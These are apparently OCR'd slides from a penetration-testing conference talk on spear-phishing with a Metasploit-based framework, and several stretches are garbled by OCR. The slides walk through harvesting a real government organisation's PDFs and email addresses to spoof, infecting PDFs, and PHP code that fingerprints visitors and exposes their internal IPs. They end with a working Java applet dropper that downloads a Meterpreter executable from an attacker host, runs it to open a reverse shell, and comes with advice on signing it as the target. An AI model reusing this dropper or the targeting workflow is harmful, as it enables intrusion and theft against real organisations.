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Valsmith 

- Affiliations: 

• Attack Research 

• Metasploit 

- Work: 

• Attack Techniques Research 

• Pen Tester/ Exploit developer 

• Reverse Engineer 

• Malware Analyst 




Previous Talks 

- Exploiting malware & vm detection 

- Kernel mode de-obfuscation of malware 

- Data mining malware collections 

- Tactical Exploitation 

- Post Exploitation 

- Analysis of foreign web attacks 
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Overview 



• Spear Phishing for Pen-Testing 

• Working on a Framework on top of 
Metasploit 

• Phile Phishing 

• Web Phishing 

• MSF automation 

• Abusing TOR 

• Tying it all together 
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Spear-Phishing 



This is the way people are getting in NOW 
Remote exploits much less prevalent 
Blended attacks combining: 
-Web 

- File formats 

- Malware 
-Social Engineering 
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Spear-Phishing 

How often do you pen test this way? 
Do clients let you? 
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Spear-Phishing 

You're missing a major vector! 
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Spear-Phishing 

Attackers now use targeted client side methods 

Web kits prevalent 

- Mpack, tornado, , luckyspolit, zunker 

- Who knows what's in these ? 

- Uncontrolled environment 

File format exploits abound 

- Sometimes get built into MSF,Core 

- Same problems as web kits 

- Little public knowledge of FF RE methods 

Solution? RE what the attackers do and make 
their techniques reliable 
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Work Flow 



Thoroughly recon target 

Build a "legend" for your attack 

- Find plausible documents from the target 

\ 

Build your vector 

- Infect PDF's 

- Build a malicious website 
Cast your line - send the target the lure 
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Work Flow 

Setup a server side exploitation system 
that can handle many clients at once 

Receive the incoming access 

- Design to bypass their firewalls 

- Look for proxies, HIDS/HFW, egress ports 

• Inject into pre-authorized browsers 

Automate your post-exploitation actions 

- Scripts to grab passwords, install backdoors, 
enumerate info, grab tokens, log manipulation 

Complex, needs a framework 
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Why a Framework? 
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Why a Framework? 



Client side is the new paradigm as are frameworks 
Phishing = client side attack surface facilitator 
Most client side tools are manual / standalone 
Core Impact is $$$ 
Pentesters need 

- Standardizable 

- Controllable 

- Automatable 

- Customized methods 

Targeting not as well defined or supported 
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Targeting? 
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Targeting 



• Greatly increa ses chances of success 

• Heavily social 

• Requires reco] 

• The more kno! 
better 

• Tactical Explol 

• Use target's p 
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Targeting 



Generic File Hunting / File Harvesting 
Creative googling for documents 
Read documents for juicy details 
Read deeper 
- Harvest meta data for juicy details 
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Targeting 



Understand your targets infrastructure 

- Tactical Exploitation topics apply 

- Enumerate targets "home" or actual networks 

• Beyond just the hosting company 

- Look for leaked proxy log analysis results 

• These give you: 

- Client applications 

- Update frequencies 

- Anti-Virus 

- Anything that communicates out 

- Internal IP addresses 
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MySQL Squid Access Report 2.1.4 

[ Home | Administration ] 

[ | ] 

[Hosts and Users Summary for a Specific Day| 



<< < Friday, 17 August 2007 > >> 



[ Sites Sumrr pecific Day ] 

r Set this e default 1 



21 4927, 30K 

12 1390, 24K 

31 2427, 74K 

58 8745. 28K 



HOST IP USERNAME TIME BYTES 





78 


10 


78 


10 


78 


10 


78 


10 


78 


10 


78 


10 


78 


10 


78 


10 


78 


10 





494 http://www.goo 

362 http://www.friv 

355 http://www.friv 

360 http://www.friv 

355 http://www.friv 

355 http://www.friv 

356 

309 

364 http://el.extreme-dm.eom/slO.g? 

355 http://www.friv.com/ 



STATUS 

f? TCP_MISS/200 
TCP_IMS_HIT/304 
TCP_IMS_HIT/304 



TCP. 



[MS_r 



TCP_IMS_HIT/304 

TCP_IMS_HIT/304 

TCP_IMS_HIT/304 

TCP_IMS_HIT/304 

TCP_MISS/304 

TCP_IMS_HIT/304 



ip of the databas 



ii i .nil, , [ 1 1 4 i .i 2004-200.. L iannis Stoili 

Licenced under the ice nee. 
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f if ffwrfij/ Squid Analysis Report Generator 



Squid User Access Reports 

Period; 2009May22-2009May22 I 
Sort; BYTES, reverse 

Topuser | 



Topsites 
Sites 3. Users 
Downloads 
Authentication Failures 



num| |userid 


CONNECT 


BVTES 


MBYTES 


INCACHEOUT 


ELAPSED TIME 


MILISEC 


«*iTIME| 


l|ll|Gfe|adminhotel 


13.03K 


247 .35M 


31.30% 


0.30% 


33.20% 


11:24:34 


41,074,031 


27.35%| 


2 1 ill Hy | Filippo v-ei 


3.35K 


156 .73M 


15 .34% 


5.32% 


34.63% 


09;03;55 


32,635,341 


21.73%| 


3|ll|Gfe|pogar 


3.22K 


153 .&&M 


13.44% 


0.36% 


33.64% 


01;02;34 


3,754,743 


2.50%| 


4| ill Gfe| stereotip 


3.27K 


30.17M 


10.14% 


2.05% 


37.35% 


00:52:35 


3,155,360 


2.10%| 


5||||&fe| market 


4.23K 


51.03M 


6.46% 


20.71% 


73.29% 


07:59:40 


23,730,301 


13.17%| 


6||||%|anton 


&.35K 


50.&1M 


6.40% 


0.63% 


93.32% 


00:41:13 


2,473,322 


1.65% | 


?\ III jurist 


364 


33.33M 


4.23% 


1.11% 


33.39% 


00:03:42 


522,727 


035% | 


S||||%|buhgalter2 


3.0&K 


1&.27M 


2.06% 


4.03% 


95.92% 


00:56:00 


3,360,735 


2.24%| 


'J |||^ dlexv 


12 


462 .50K 


0.06% 


0.00% 


100.00% 


03:33:21 


34,401,323 


22 .31%| 


TOTAL 


49.67K 


790.37M 




3.10«*i 


96.90«*i 


41:42:44 


150,164,799 




AVERAGE 


5.5 IK 


87.8 1M 






04:38:04 


16,684,977 





Generated by sarg-2.2.5 Mar-03-200 on May/23, ,'2009 06:43 
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100 
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00:00:01 


1,597 


0.04% 
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<% 


p a , a 2 re 5.m 


8 


63 7 IK 





04% 


2 


94% 


97 


06% 


00:00:08 


8,298 


0.22% 
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Bookmarks lools 


Help 














X 


















^ | l3 |http://v 


ww.iipl.fudan.edu 


cn/squid-reports/2007May 1 0-2007May 1 0/ 


. 


- |K3H 


nurhs 


















■ 


http://ww...user.htrr 


£\ http://ww. 


.dex.html 


l3 htt p ; // ici 


.index.html 


http:/. 


.ay 10/ iu 


U 



Squid Analysis Report Generator 



Squid User Access Report 

Period; 2007Mayl 0-2007Mayl p | 



Topsites Report 



NUM USERID | CONNECTl BYTES |%BVTES IN-CACHE-OUT 


ELAPSED TIME MILISEC %TTME 


1 10.20.2.5 | 34.14K| 1 ,77g| 94.69%| 


00% 


98.41% 


00:00:00| o| 


00% 


2|| 10.20.2.210 | 3.63k| 47.00m| 2.51%|o 


00% 


99.96%. 


00:00i00| o| 


00% 


3|| 10.20,2,205 | 1.71K| 19,5&m| 1.04%|o 


00% 


98.95% 


00i00i00| o| 


00% 


4|| 10.20,2,235 | 1.54K| 3,27m| 0.44%| 


00%|99,13%| 00i00i00| o| 


00% 


5|| 10.20.2.197 | 1.05k| 7.25m| 0.39%| 


00%|98.25%| 00i00i00| o| 


00% 


&|| 10.130.102.43 | 347| 6.00Nl| 0.32%| 


00%|97.41%| 00i00i00| o| 


00% 


7|| 10.35,72,201 | 30o| 4,34M| 0.26%| 


00%|92,56%| 00i00i00| o| 


00% 


S|| 10.20,2,200 | 404 3.45M 0.18% 


00% 


77,44% 


00i00i00| o| 


00% 


s\\ 10.20,2,80 315| 2.33M| 0.12%|o 


00% 


93.77% 


00:00i00| o| 


00% 


10| | 10.20.2.16 45 31S.31K 0.02% 


00% 


79.45% 


00:00i00| o| 


00% 


ll|| 10.64,130.23 | 96 133.24K 0.01% 


00% 


0,00% 


00i00i00| o| 


00% 


12|| 10.100,101,10l| 165|l01,14K| 0.01%|o 


00%|94,48%| 00i00i00| o| 


00% 


13|| 10.20.2.2 ll| 66.75K| 0.00%| 


00%| 0.00%| 00i00i00| o| 


00% 


TOTAL | 44.77k| 1.87g| 0.00% | 08.38%! 00:00:Oo| o| 




AVERAGE | 3.44K 144.00M 






00:00:00 



Generated by sarg-2,1 Nou-29-2005 on May/10/2007 21:46 
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Squid Analysis Report Gener 
Squid User Access Report 


3 to. 


















ACCESSED SITE CONNECT 


BYTES 


MBYTES 


IN-CACHE-OUT 


TIME"' 


_^H^d 


192.168.38.104:1692 1 


760. 74M 


42,91% 


0.00%| 100.00% 


00 


49 


35 


2.97M| 182%| 






















37% 




















132M| 


31% 


www.w3.org 2.35k 


l 


27M| 6.11% 


0.00% 


10C 


■„■, 


00 


s; 


3F 




ISM 1 


,3% 


l-i-l 6 104 1651 




^] ^**j °™* 


IOC 





00 


'34 


32 


272 































U- L ll'4 If <■ 




31M 


2,33% 


0.00% 


10C 





00 


,;,; 


41 


161 


76k 





10 
































dn.c9.56.com 




35 


17r 


1,98% 


o.on% 


1 no 


■„■, 


00 


Mr 


3. 


394 


63k 


n 


-4% 


ftp.pconline.com.cn 




29 


021V 


1,64% 


0.00% 


IOC 





00 


4~ 


22 


2 


72M 


l 


67% 


192.168.180.153:1916 




28 


IBM 


1,59% 


0.00% 


IOC 


50% 


00 


01 


5C 


110 


03k 





37% 
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99 














33% 


d.4,ll,,,,r,-, | 




100 


■„■, 


00 


M- 


25 


145 


96k 


39% 


down6.flashoet.com | 4 


25 


10% 


00 


Oi 


2E 


28 


50k 


32% 


d7.cl7.56.com 1 


: : 


IOC 












29k 


:■" 




1.49K 


49MJ 0,59% 0.55% 




45¥. 


00 


.7:4 


0' 


1 































proxy88.com 


261 


■>■> 


*. 


00 


44 


-u 
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65M 
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r.. 
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85M 


0,50% 


0.00% 


IOC 
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22 


202 


13k 





12% 






























































course.shufe.edu.cn 52 






0,35*1 34,90%| 65 
















d6.c9,56.com 1 
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99 f, 


0,34%| 0.00%|100 


■„■, 


00 


ni 


M- 


67 


16k 


34% 
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800 




73% 


00 
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51 


651 


05k 


4M 






























d7.,;16.56.com 




4 


OBM 


0,23% 0.00% 


,■„■ 


30% 


00 
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02K 





V. 






"I 


65M|_ M 1%| 0.0 
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■>■> 


S9% 


00 
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394 


52k 
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M% 


www.scbaijia.com 


124 


45M| 0,19%| 0.36% 


99 


64% 


00 


.;.; 


OE 


125 


58k 





38% 


imaoes.sohu.com 


3Zl| 3 


26M| 0,18*1 37.06% 


62 


34% 


00 
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.36 


36 


01k 





32% 
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Sn-^Sl-iS 
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21 141 


45k C 


39% 


www.folano.com 70 


9E 
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narte Icols Help 


http://www.npp-osi.kiev.ua/squid-reports/2009Apr02-2009Apr04/192.16 


,1 http:/...x.html http:/...avl 


0/ http:/...0.html http:/...5.html 
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jhtt...tml|Q( |_ 



J Squid Analysis Report Generator 
luid User Access Report 



USERID IP/NAME DATE/TINE 






j j 100 11 192.1 LOO [j n 1 00 l 


http rapid hare i i til 054 Ru E tt ir pid n ru . parti. rar 






http rsl69.rapidshare.com/file i 1 in epidem.ru , parti, rar 






http : //a cti v e x . m i cro s oft . co m/o b j e cts/o ca et . d 1 1 












http : l/a cti v e x . rn i cro soft, co m/o b i e cts/o ca et . d 1 1 


















http : //co d e cs . m i cro s oft . co m/i s a p i/o eg et . d 1 1 




02/11/2008-17:06 :0t 


http : l/a cti v e x . rn i cro soft, co m/o b i e cts/o eg et , d 1 1 






http : //co d e cs . m i cro s oft . co m/i s a p i/o eg et . d 1 1 






http : //u 2 3 , e s et , co m/n o d u p d/e x p i re , r a r 






http://f a vi con. yandex 








http://favicon.yandex 


n-tt : r micro ,=, ,m 






http://favicon.yandex 


'www.bse.sci-lib.com 






http ://favicon. yandex 


n etrfa v icon/be etrans.com 






http://favicon.Yandex 








http ://favicon. yandex 


r r i Kan itua. n, 






http://favicon.yandex 


net/favicon/www.irnperial-vin.com 






http ://favicon. yandex 








http://favicon.yandex 








http://favicon.yandex 


skTpe.com 












http://favicon.yand; letsmoto.com 


















http itaet m/di nload etup e e 






http : //fa v icon, y a n d e x . n etrf a v i co n/f o rum.ixbt.com 










02 11 200 -1= i- 07 


http://favicon.yandex.net/favicon/forum.ru-board.com 






http : //fa v icon, y a n d e x . n etrf a v i co n/f o ru rn 2 . rn o b i 1 e - re v i e w . co m 




02/11/2008-15:19:03 


/dflt/2008/01/972139 54cc24ddSd4632957c3b212c7i2eab09b0126b0e.eab 




02/11/2008-15:19:03 


http://www.downluad.windowsupdate.com/msdownload/update/software 
/dflV2008/0i/9764S9 4e3abcc92co4ce6 3f9bd2c3di e2d3488ba8cl379.cab 




02/11/2008-15:26:51 


^00^^7-5213357-^5*2850880/^4-1 






http ij nun.vande .net'ra icon/ bt com 






http : //fa v icon, y a n d e x . n etrf a v i co n/a llo.kulich k i . co m 






http : //fa v icon, y a n d e x . n etrfa v i co n/w w w . n - a d m i n . co rn 






http : //fa v i co n . y a n d ex. n etrf a ,■ i c o n/p daforum.ladoshki.com 






http://favicon.yan slist.com 
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PHILE PHISHING 
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Looking ahead 
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Target File Selection and Infection 

Search the web for your target and 
available files FishingFocus 

- Newsletters are great 

- Conference announcements 

- Find recent things to modify 
-Take advantage of relationship 



• If your target partners with someone else, steal 
and infect their documents and send to client 

Goal is to get them to click 

Script to automate target PDF acquisition 
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Target File Selection and Infection 



How do you select a file for infection? 

- People believe PDFs are a safe format 

- People trust PDFs that are from their own 
organization 

- Pick topics of likely target interested 

- Pick files that are widely circulated 

• Large audience 

- Newsletters 

- Company forms & instructions 

- "Snow day" & activity announcements 
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File Edit View History Bookmarks Tools Help 


jj£ - C http:// WWW .google.co m / S e ar ch?hl=en<k. 


aFe=oFFadient=Fi f eFox- a arl S =o f g. m oalla%; • .., • siteicn. 


Web 


mvalsmith@gmail.com | 


r* \ 


VJlU I J^IC |site:. gov.cn + filetype:pdf 


.....cardi 


o 


Web Show options... Results 1 


- 10 of about 338,000 from gov.cn for + filetype:pd 



[PDnfflSMii ?l 3fc£ -t Translate this naae l 

File Foirnst PC'F--— i:i.:.i:.e .— ■: i ■:■!:■ nt 

^ia H, r *p = ° unr * n i- m n &w k 

[pdfi Page 1 ^rKi.200711 ^ ^T« 2007 ^[g1t^6#" Efctiifll &fctE ... - I Translate tf 

PDF/Adobe Acrobat 
ft[2007]i* ?T oo -in";, tta».#ttS* - RJ&S5S «iS¥ 

if, r-K.srHiff-^-.t ■isatwi^a... 

WAV Vi kO U g Ci'«' r " " '2 7 P 1 n rif _ 



] 



File Format. PDF/Adobe Acrobat 

_" u OS j_ » ii ] §u*/± r ( n _" _l - 

±. Hr. EGRfgS^*. Sr.1. 1-1. DFL100-33! %&#.% ... 

www.zhb.gov 910. pof- 

[PDFjliFlfflSifli MM -\ ] 

PDF/Adobe Acrobat 

^mmm±%m+mmm.^m ^ . i*& i . us 8.2. (n» ; Mfh-B±-» 

S, ;i fe)'N22iooe 2cpm ---,,";- ^f; i M-I2211 

U. "-- ~ -" '": g.mi. 

,PDF, ^i : £#fr¥fell*£Mjg£tt -[ Translate this pag e] 

File Format PDF/Adobe Acrobat 

r :±nmmi±£mm ir^^j^v-^iti c p^b 1m i i (2006 

- g 1lB p— ■ _ Bl i -^ sft£tt&lfrS8ft- 
www.gansi sl.pdf- . ,,ar pages - 

[pdf] FMSTfrA.gi%ffi - [ i.^.^.^ this pag e ] 

File Format FTJ'F — ii.ntje .-a ob at 

1 s - ru -i - .^f) -^m -n. 1 > t ooe 

iEiE*S!?IW.affl SEil5i.ASRJr?, SiEiiilA, f^ffilS ... 
jiangyou.gov:: iOH.pdf- 

,pdfi E^Mirn S ffjflftB « ' = JE * M& « ftfeWa a g 8 tmm l-[ Translated 

PDF/Adobe Acrobat 
1 i = , C2005] If ? SJ SSfcti _~ bi - L ifl " , n3ri"H, 



Find file targets 
to infect 



What's wrong with this 
picture? What shouldn't 
we have done? 
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Spatial Data Infrastructure - 
Asia and the Pacific Newsletter 



Spatia Data Infrastructure - Asa and the Pacific (S:;l- 
AP) is a free electronic newslettei fci e le interested n 
GIS, remote sensing, and data management issues in 
As a and the Pacific. It a Tit. to 'aise awareness and 
provide useful information to strengthen national SDI 
initiatives and support synchronization of regional efforts. 
The Permanent h nr- i -•- n|.hic Information 
for At.-: :■-•■•, :-i -:■■:' : t t e: : - :■ ': . - t\v: 

is promoting SDI development. The newsletter is 
sponsored and prepared by the Global Spatial Data 
Infrastructure (GSDTJ Secretariat with input from PCGIAP. 



T - Dl-A- 



f.o.. "avr news or information related to GIS, remote sensing <i ' ':: - ' t you would like to 

In ill 11 '- i . <i i i -nents publications, reports, '.vetetes of lte'est. etc.). Kindly send us the 

natelals :::v the 25 s1 of each month to s li i ' that e can iclude lem in the newsletter. 

:ol leagues who may find the information useful, and ideally they will 

- - - - i- the GSDI v 



Oi- o.int: K* it'll 

SBBBan 



To Ms Kate Lance, 

We are all grateful for the help and guidance provided by Ms Kate 

1 1- l-t-i - i i il- i Mi-ll- 

the beginnig to now. Without this foundation and her coniritrient o 
would have little or nothing. We truly appreciate her help 1 " t- ;.- : e 
-tegai'tl I ii mi and staff 



starting and building these regional 
and all the regional newsletters from 

01 to cent nue to build th 

matters. Best wihses to -(ate. 



Thanh ,-iji to ::■? -n~elle 'x.:s = v = l_ L -: - Sung-Bae Yoon 
T-an sport at ion of -<o-ea Mar -,o Ito. Permanent Committee on 
Secretariat (Japan) for their contribution: to tl : t-sue o! the ne^t r"e 



GIS KOREA 2005, 1B-20 May 2 "' Hall. Si-tt : t." 

TMerliiitr f n n tnJTnii| 1 -1 I a leading re' '" 

notional 'SIS programs for the country. They litiated trie five-year no" 
topographic and lie nt": ira,t ing t.nt: ':■ ri'tojnge ■:-.! i -ft inclotv 
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Lets say our target is a 
technical organization in 
the Chinese government 

Here is a good candidate 
PDF they provide freely 
for us 
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http://www.sbsm. gov.cn/pcgiap/tech_paprs/5DIAPv2n4.pdf • • i.s'sbsm.gov.cri 
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Spatial Data Infrastructure - 
Asia and the Pacific Newsletter 



1 3-22 September 



7th International Conference on Geosvnthet - : ge ec inical engineering, 
environmental eng ne.eir::. z . en: leer " ;: ";. : ,il" cs, geology, etc.). 
Deadline for abstracts: 31 March 2QQ5. 



9-13 October 



Beijing, China 20 m CODATA (Committee on Data for Science and Technology ) 
Conference Contact: codata@dial oleane.com 



To subscribe to S._:|-AP clease do so online at: 
http://www.gsd i .ora/newslist/gsd isubscribe .asp 

Oh Sung Kwon, Editor 

Global Spatial Data Infrastructure! Association 

http://www.qsdi.org 

Copyright ©2005. All rights reserved.. 



Who publishes 
this newsletter? 

Target for your 
attack legend 

Spoof e-mail 
from this person? 



[pdf] Spatial Data Infrastructure - Asia and the Pacific Newsletter 

PDF/Adobe Acrobat- as HTML 

newsletter is sponsored and prepared by the Global. Spatial Data Infrastructure ... Best 
regards. Oh-Sung Kwon, Editor, sdi-ap@q3cii.0rg. Input to this Issue ... 



"Ii eCi 11 11 e Li Pnt. _in_Kli Mazmi Saleous, and Wait Jentoft-Nilsen, N 
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File Edit View History Bookmarks lools Help 






] ■ http://w.w.', google. c 


3m/search?q=%40sbsm,gov.cn&ie=utf-8&oe=utf-88(aq=t8(rls= - - 05sbsm.gov.cn j ' A 


| ■*Jsite:,gov.cn4-filetype:... _. | i_ 2007rjl.pdf (application.. 


5DIAPv2n4.pdf (applica... Bsbsm.ijiiv.cn - Goo... Google Groups 


VjlO 1 )Q U£ f@sbsm.gov.cn 


L * 1 

search 


o 


Web Show options... 


Results 1 - 10 of about 110,000 for@sbsm.goy.cn. (0.24 seconds) 



iiM. - [ ] 

£,p ' e=2 Si MI g»Si! KSS L ft¥£S ^SigUi, «A3\ £S"&#^ 

So 

iin.gov.cn/-109k- - • pages - 

PCGIAP Publication No.1 [T] 

PCGIAP PUBLICATION NUMBER 1 . "PCGIAP Publication No. 1: A Spatial Data Infrastructure for 

the Asia and the Pacific Region" is the first in a series of ... 
www.sbsm.gov.cn/pc s.htm-3k- 

State Bureau of Surveying and Mapping of the People's Republic of ^. 

Supported by: Administrative Information Center, State Bureau of Surveying and Mapping E- 
rnail : support@sbsm.gov.cn Add: 9 Sanlihe Road, Beijing 100830 ... 
en.sbsm.gov en/- 17k - 

sbsm.qov.cn - Traffic Details from Alexa 

Note that if a user starts browsing in another browser tab while viewing sbsm.gov on, that time 
is not counted for sbsm.gov.cn. ... 

sm.gov.cn- 26k- - pages - 

National Geomatics Center of China 

... governmental agency, subordinating to State Bureau of Surveying and Mapping (SBSM). ... 
Tel : Efl> +86-10-68462660 Q Fax : I< +86-io-68424ioi £ Email : ^flSi^ ^mHTV 
ngee sbsm gov. cr 

surveying ITI 

http:/Aw.w.sbsm. gov. en/. ..on Management of Surveying and Mapping activities ...on 
Management of Surveying and Mapping activities Conducted by Foreign ... 
search sbsm gov cn/rest - 22k- 

Cac: ■---: - —■■■:■ pages - 
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target 

email 

addresses 

to send 

infected 

files 

to/from 
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data and products, and its integration into geospatial information systems, b) 
CEOS Information Infrastructure Task, Team was also formerly closed, JAXA 
Pacific] Mr. C. Ishida. JAXA. TEL: 6221 9139 Q ... 

.nrscc .gov.cn/Upfiles/2004-3-5-14-50-39- 1 ceos 22_.pdf - S:mlar pag es - 

ipdfi GIS and Remote Sensing for Disaster Risk Assessment jtjL 5 
PDF/Adobe Acrobat - 

iIlrtt-1-THl. ill!- !i mi eti i i miii I fi | i i- -pi 

re ... for manipulation of tbese spatial data which ... management, with case sU 
the Asia- Pacific region. Objectives ... 

astev'?!^?:--— ---' '•'!' 



0>sbs 
willingness 



[pdf] CEOS NEWSLETTER 

as and spatial scales from global to 






d Global Garb! 
importation. ... 
ksia, Pacific] 



n Observing Strategy 
CEOS and for present 
Month & South America]. 



[pdf] Minutes of the Committee on Earth Observation Satellites Tenth ... 

PDF/Adobe Acrobat - 

WGGV also published its Newsletter no 6 with support from BNSC developments in 

graphic Information Systems and spatial data infrastructure, based on the ...... Earth 

nation data in the Asia Pacific region. 10.11.2 ... 



he project was implemented through 5 phases, including data collection, ... management, 
financing of urban environmental infrastructure investments. .... the UNEP Environment 
;ssment Programme for Asia and the Pacific (UNEP EAP/AP) ... design (spatial); and 3). 
nical capacity for exchange of data ... 
.7c.gov.cn/color/Diii: = =:oes : ontentDi: :ntid=1 2874 - 29k- 

[ppt] Development of Regional Statistics 1 

Microsoft Powerpoint 

"'1 mi Enin (la i i ill mil "i u-nii* - run Spatial 

units data available. Title of statistics .... German, Pietro, Towards international comparison of 
regional disparities in Asia and. the Pacific, PPT version, presented at APEx 2 Meeting, Sept , 
2006.... 



[pdf] Report on Ecological Footprint in China 

PDF/Adobe Acrobat - 
in infrastructure that will have long- term implications for resource use in the ..... The pet- 
person Footprint of each nation in the Asia-Pacific region is shown on the ...... Spatially 

compact city: Though a spatially compact urban development plan ..... DATA SOURCES. The 

Ecological Footprint calculations of ... 

www.cjw.govm ad - tvn: - I--- j "_ " 1-411. U lull ' [nit 



• 



Gather sites that 
have plausible 
relationships to 
send the infected 
files to 
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File Infection 



Why PDFs? 

- Javascript 

- Code Execution 

- Nested PDF's 

- Exploits / vulns in readers 

- Dynamic content 

How do we infect them? 

- Incremental update 

- Tedious to do by hand 

- Colin RE'd the PDF file format 
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File Infection 



Adobe_basic_social_engineering.rb 
ruby script for infection 

- Metasploit module 

- Select a PDF to infect 

- Pass file to module 

- Output infected PDF 

- Other tools generate blank 
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PDF Defiler 



• Demo PDF Parser 

• Demo PDF Infector 
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Web Phishing 




These are the detailed mechanics of how to do this type of work 
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Web Phishing 

Direct targets to your website 

Enumerate the target using web app 

Socially engineer the target into believing everything 
is "ok" 

Execute code on the target via SE, applet, exploit, 
etc. 

Handle incoming access from target 

Automate post exploitation activities 

Use a reliable framework 
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Web Phishing 



Components 

- Target Sieve 

• OS detection 

• IP detection 

• Browser detection 

• Decision making 

- De-cloaking 

- Signed Java Applets 

• Fake certificate to targets org 

- Social Engineering Attack 

- Obfuscation 
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GENERAL FRAMEWORK 
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Web Phishing - Sieve 



These are examples we are providing 
Could be done many (better) ways 



genHeader() 

Generate header, noscript to 

test JS 
ipCheck() 

Get target IP and compare to 

scope 
javaCheck() 

Verify Java is enabled 
osDetect() 

Determine the operating system 

type 



browserDetect() 

Determine the browser in use 
jsDecloaklP() 

Get natted / internal IP using 

javascript 
japdip() 

Get natted / internal IP using 

javapplet 
Logger() 

Log captured info to a file 
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GENERATE A HTTP PAGE HEADER 
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Web Phishing - Sieve 

function genHeader() { 

echo "<html>"; 

echo "<body>"; 

echo "<noscript>"; 

echo "<meta http-equiv=\"refresh\" 
content=V'0;url=$bounceurl\">"; 

echo "</noscript>"; 

} // end genHeader 
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VERIFY TARGET IP IS IN SCOPE 
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Web Phishing - Sieve 

function ipCheck($target_ip) { 

SscopelPflag = 0; 

if ((preg_match(7$firstRange/",$target_ip, $matches)) || 
(preg_match(7$sndRange/",$target_ip, $matches))) { 

SscopelPflag = 1; 
} // end if 

else { 

SscopelPflag = 0; 
} // end else 

return SscopelPflag; 
} // end ipCheck 
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VERIFY JAVA INSTALL 



Slide: 43 



Web Phishing - Sieve 

function javaCheck() { 

echo "<script language=javascript>"; 

echo 'if (navigator.javaEnabled()) { }'; 

echo 'else { document.writefNo 
JAVA"); window.location = 
"http://blog.attackresearch.com"; }'; 

echo "</script>"; 

} // end javaCheck 



Slide: 44 



»** 



OS DETECTION 
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Web Phishing - Sieve 



function osDetect($useragent) { 

// Check for windows, and send to windows page 

if (preg_match(7Windows/", $useragent,$winmatched)) { 

$ostype = "win"; 
} // end windows check 

// Check for linux, and send to linux page 

elseif (preg_match(7l_inux/", $useragent,$linmatched)) { 

$ostype = "linux"; 
} // end linux check 

// Check for mac, and send to mac page 

elseif (preg_match(7Macintosh/", $useragent,$macmatched)) { 

$ostype = "mac"; 
} // end mac 

else { 

$ostype = "unknown"; 
} // end else 

return $ostype; 

} // end nsDetect 
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GATHER BROWSER INFO 
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Web Phishing - Sieve 



function browserDetect($useragent) { 

// Check for firefox 

if (preg_match(7Firefox/" 5 $useragent, 
$winmatched)) { 

$browsertype = "ff"; 
} // end ff check 

//Check for IE 
elseif (preg_match(7MSIE/ n , 
$useragent,$winmatched)) { 
$browsertype = "ie"; 
} // end ie check 

// Check for safari 
elseif (preg_match(7Safari/ M , 
$useragent,$winmatched)) { 
$browsertype = "safari"; 
} // end safari check 



// Check for opera 

elseif 
(pregjmatch ("/Opera/", 
$useragent,$winmatched)) { 

$browsertype = 
"opera"; 

} // end opera check 

// Browser Unknown 
else { 

$browsertype = 
"unknown"; 

} // end unknown check 

return $browsertype; 

} // end browserDetect 
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INTERNAL ANATOMY OF A BONY FISH 

dorsal air spinal 

esophagus aorta stomach bladder cord Kidney 




. 



GET TARGET'S INTERAL IP VIA JS 
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Web Phishing - Sieve 

function jsDecloaklP() { 

echo '<script type="text/javascriptV; 

echo 'function natlP() {'; 

echo ' var w = window.location;'; 

echo ' var host = w.host;'; 

echo ' var port = w.port || 80;'; 

echo ' var Socket = (new 

java.net.Socket(host,port)).getLocalAddress().getHostAddress(); , ; 

echo ' return Socket;'; 

echo '}'; 

echo '</script>'; 



echo '<script language=javascript>'; 
echo'reallP = natlP();'; 

echo 'document. location. href="sieve.php?dip= 
echo '</script>'; 

} //end jsDecloakIP 



'+reallP;'; 
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GET INTERAL IP VIA JAVA APPLET 
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Web Phishing - Sieve 



function japdip() { 

echo '<APPLET code="MyAddress. class" archive="MyAddress.gif" 
WIDTH=500HEIGHT=14>'; 

echo '<PARAM NAME="URL" VALUE="sieve.php?japdip=">'; 

echo '<PARAM NAME="ACTION" VALUE="AUTO">'; 

echo '</APPLET>'; 

} // japdip 

Check out: http://www.reglos.de/myaddress/MyAddress.html for info about the 
class file. 
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LOG ALL RELEVANT INFORMATION 
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Web Phishing - Sieve 

function logger($target_ip,$dip,$ost,$bt,$sipf,$hitdate) { 

$nl = "\n"; 

$delim = "|"; 

$data = $target_ip . $delim . $dip . 

$delim . $ost . $delim . $bt . $delim . $sipf . $delim . $hitdate . $nl; 

SoutFile = "clientlog.txt"; 

$fh = fopen($outFile, 'a') or die ("cant open logfile"); 

fwrite($fh,$data); 

fclose($fh); 

} // end logger 



Slide: 54 



»** 



DEMO 



File Edit View History Bookmarks Tools Help 






(PI ' C lBj 1 l3 1 http://192.168. 0. 34/metaphish/sieve. php?dip= <Cf - 


|G] T | upera user ag }--' 



INSCOPE: YES 

TARGETTP: 192.168.0.16 

DECIP: 192.168.0.16 

JDECIP: 

BROWSERTYPE: IT 

OS: win 

HTTOATE: 20090402152229 

| Done 



Example Page 

Normally you wouldn't 
display output 

Shows all the target 
acquired data 
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Web Phishing 

Social Engineering 

• Java Applet for distributing and executing 
meterpreter 

• Client hits page 

• Java applet window pops up 

• Client hits "Run" 

• Applet causes client to 

- (in the background) 

- download meterpreter executable from your site 

• Applet executes meterpreter 

• Meterpreter sends reverse shell to your server 
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Web Phishing - Dropper/Exec 



import Java. applet. Applet; 
import Java. io.*; 
importjava.net.*; 
import java.io.lOException; 

public class WebDispApp extends Applet { 
public WebDispApp() { } 

public void init() { downloadURL(); cmd(); 
} /* end public void init */ 

public void downloadURL() { 

OutputStream out = null; 
URLConnection conn = null; 
InputStream in = null; 

try{ 
URL url = new 
URL("http://192.168.1.1/data/win/met.exe"); 

out = new BufferedOutputStream( 

new FileOutputStream("c:\\met.exe")); 

conn = url.openConnection(); 

in = conn.getlnputStream(); 

byte[] buffer = new byte[1024]; 

int numRead; 

long numWritten = 0; 

while ((numRead = in.read(buffer)) != -1) { 
out.write(buffer, 0, numRead); 
numWritten += numRead; 

}/* end while*/ 



} /* end try */ 

catch (Exception exception) { 

exception. printStackTrace(); 
} /* end catch */ 

finally { 
try{ 

if (in != null) { 

in.close(); 

} /* end if */ 

if (out != null) { 
out.close(); 

} /* end if */ 
} /* end try */ 

catch (lOException ioe) { } 
}/* end finally*/ 
} /* end public void downloadURL */ 

public void cmd() { 

Process process; 

try { 

process = 
Runtime.getRuntime().exec("cmd.exe /c c:\\met.exe"); 

} /* end try */ 

catch(IOException ioexception) { } 
} /* end public void cmd */ 
} /* end public class */ 
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Web Phishing - Dropper/Exec 

• How to make it deadly? 

• Use cryptographically signed Java applet 

- Sign it as your target 

- User reads the cert and trusts it (usually) 

- So many sites have invalid certs users don't even 
notice anymore 

• Change up filenames / code to reflect targets 
application infrastructure 

- If they use wordpress, use wordpress sounding file 
names for example 
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Web Phishing - Dropper/Exec 



Compile the applet: 

